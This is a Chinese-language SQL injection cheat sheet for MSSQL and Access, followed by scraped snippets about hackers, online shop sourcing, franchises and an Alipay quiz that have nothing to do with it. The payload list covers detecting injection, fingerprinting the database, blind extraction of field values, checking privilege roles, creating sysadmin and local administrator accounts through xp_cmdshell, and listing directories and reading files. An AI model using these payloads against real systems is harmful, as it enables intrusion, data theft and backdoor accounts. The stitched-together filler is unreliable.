1.判断是否有注入
;and1=1
;and1=2
2.初步判断是否是mssql
;anduser>0
3.注入参数是字符
'and[查询条件]and''='
4.搜索时没过滤参数的
'and[查询条件]and'%25'='
5.判断数据库系统
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)frommsysobjects)>0access
6.猜数据库
;and(SelectCount(*)from[数据库名])>0
7.猜字段
;and(SelectCount(字段名)from数据库名)>0
8.猜字段中记录长度
;and(selecttop1len(字段名)from数据库名)>0
9.(1)猜字段的ascii值(access)
;and(selecttop1asc(mid(字段名,1,1))from数据库名)>0
(2)猜字段的ascii值(mssql)
;and(selecttop1unicode(substring(字段名,1,1))from数据库名)>0
10.测试权限结构(mssql)
;and1=(SelectIS_SRVROLEMEMBER('sysadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('serveradmin'));--
;and1=(SelectIS_SRVROLEMEMBER('setupadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('securityadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('diskadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('bulkadmin'));--
;and1=(SelectIS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;--
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add';--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/add';--
;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add';--
12.(1)遍历目录
;createtabledirs(pathsvarchar(100),idint)
;insertdirsexecmaster.dbo.xp_dirtree'c:\'
;and(selecttop1pathsfromdirs)>0
;and(selecttop1pathsfromdirswherepathsnotin('上步得到的paths'))>)
(2)遍历目录
;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--
;inserttempexecmaster.dbo.xp_availablemedia;--获得当前所有驱动器
;insertintotemp(id)execmaster.dbo.xp_subdirs'c:\';--获得子目录列表
;insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:\';--获得所有子目录的目录树结构
;insertintotemp(id)execmaster.dbo.xp_cmdshell'typec:\web\index.asp';--查看文件的内容
本文导读目录: 1、你好,你能听听我的烦恼,帮我解决问题吗? 2、谁是第一代黑客 3、哪里有免费教程看 4、欧美黑客题材的电影有哪些推荐? 5、黑客的理想是什么? 6、黑客到底是靠...
做淘宝首先要做的事情找货源,货源是每一个卖家都需要慎重考虑的问题,没有货源,一般可以通过网络,和各种网络平台找货源,比如阿里巴巴,淘宝,可以和商家洽谈,寻找一种合作方式,比如微信转发,然后代发货。或者...
上面讲的都没毛病,就看你干不干好事了。当然,就目前接触的来看,还是干坏事的黑客最多。当然,国内做好事的白帽子也不少,在漏洞盒子等平台据说已。 白帽子:亦称白帽黑客、白帽子黑客,是指那些专门研究或者从...
如今,越来越多的奶茶品牌的呈现使得很多加盟商都挑花了眼,品牌什么范例的也有可让一些有选择坚苦症的加盟商操碎了心,那么,哪些奶茶加盟较量着名?跟着本文,就让我们一起来相识一下奶茶这个加盟项目哪一些较量着...
如今的社会上有着很是多的人们想着要通过创业来改变本身的近况,可是又有一些坚苦,因为各人最上说着创业实际上却不知到怎么去创业,如何去选择优秀的加盟项目,目前天在这里就为各人简朴的梳理一下创业,此刻的创业...
今天支付宝蚂蚁庄园2020年5月15日庄园小课堂的答案是什么呢?蚂蚁庄园庄园小课堂2020年5月15日的问题是【小鸡宝宝考考你,憋回去的屁,最终很可能会】。下面小编就为大家带来了答案,不清楚的朋友快来...